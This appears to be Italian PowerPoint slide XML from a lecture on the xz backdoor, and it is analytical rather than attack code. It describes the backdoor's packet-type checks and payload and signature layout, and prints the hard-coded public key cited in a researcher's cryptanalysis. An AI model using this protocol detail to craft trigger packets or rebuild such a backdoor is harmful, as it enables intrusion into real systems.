                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Prima di autenticare, la backdoor verifica il tipo di pacchetto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> facendo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="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a*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1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b+c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="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a*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1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b+c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="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&gt;3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, allora la backdoor non processa il pacchetto e prosegue;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Altrimenti:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="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a*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1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b+c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="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 == 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: un tipo di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> senza payload;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="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a*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1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b+c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="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 == 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: un tipo di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> con payload eseguibile, terminato con "\0";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="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a*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1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b+c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="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 == 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: un tipo di pacchetto con 48 Byte firmati.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A1E60A1D-1B57-50D9-2F6A-8537D53EDD57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="383412" y="2691114"/>
            <a:ext cx="11237088" cy="116955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1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|   a (32 bit)  |   b (32 bit)  |           c (64 bit)          |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                                                               |
+                     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>ciphertext (240 bytes)                    +</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
|                                                               |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+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7486918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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0"/>
              <a:t> Struttura della backdoor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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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84</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11853204" cy="477053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800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Crittoanalisi di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>amlweems</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0" err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alias GitHub di Antony </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Weems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, un ricercatore Google.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>La chiave </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" baseline="-25000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>pub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>è stata recuperata dal codice sorgente della backdoor (era hard-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>coded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>E' stato impostato un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>honeypot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> per intercettare eventuali messaggi da remoto;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Si è notato che i primi 32 Byte di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sono utilizzabili nel cifrario chacha20 come chiave crittografica. Con un attacco di tipo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chosen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>plain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-text sarebbe possibile decifrare qualsiasi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chypertext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> che verrebbe inviato da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Tan.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt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A1E60A1D-1B57-50D9-2F6A-8537D53EDD57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250062" y="5091414"/>
            <a:ext cx="11237088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1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                    signature (114 bytes)                      |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| x (1 bit) |            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>unused</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> ? (14 bit)          | y (1 bit) |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>unknown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> (8 bit)        |         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> (8 bit)        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>unknown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> (8 bit)        |         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> \x00          |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+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16264060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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0"/>
              <a:t> Struttura della backdoor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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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85</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11853204" cy="42165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800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Crittoanalisi di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>amlweems</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0" err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Chiave pubblica di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Tan</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>0a 31 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 3b 2f 1f c6 92 92 68 32 52 c8 c1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 28
34 d1 f2 c9 75 c4 76 5e b1 f6 88 58 88 93 3e 48
10 0c b0 6c 3a be 14 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 89 55 d2 45 00 c7 7f 6e
20 d3 2c 60 2b 2c 6d 31 00</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2800"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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5533954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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0"/>
              <a:t> Struttura della backdoor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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
